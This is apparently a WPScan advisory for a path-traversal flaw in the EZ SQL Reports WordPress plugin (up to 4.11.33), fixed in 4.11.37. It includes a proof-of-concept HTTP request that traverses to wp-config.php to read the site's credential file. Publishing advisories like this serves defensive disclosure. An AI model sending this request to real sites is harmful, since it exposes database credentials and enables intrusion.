EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary File DownloadSign up to our free email alerts service for instant vulnerability notifications!
The plugin allows a WordPress site administrator or collaborator to download arbitrary files from the host file system though the plugin functionality of downloading .sql, .sql.zip or .sql.gz files created by the WordPress administrator. The file name to download is not sanitized and path traversal can be injected in the request.
|Proof of Concept||
GET /wp-admin/admin.php?page=ELISQLREPORTS-settings&Download_SQL_Backup=../../../wp-config.php HTTP/1.1 Host: <the host with the wordpress> Proxy-Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: <User-Agent> Referer: http://<the host with the wordpress>/wp-admin/admin.php?page=ELISQLREPORTS-settings Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_[...etc...]4af418c3efd
fixed in version 4.11.37
|Publicly Published||2015-09-14 (almost 2 years ago)|
|Added||2015-09-15 (almost 2 years ago)|
|Last Updated||2015-09-15 (almost 2 years ago)|
Copyright & License
|Copyright||All data and resources contained within this page and this web site is Copyright © The WPScan Team.|
|License||Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.|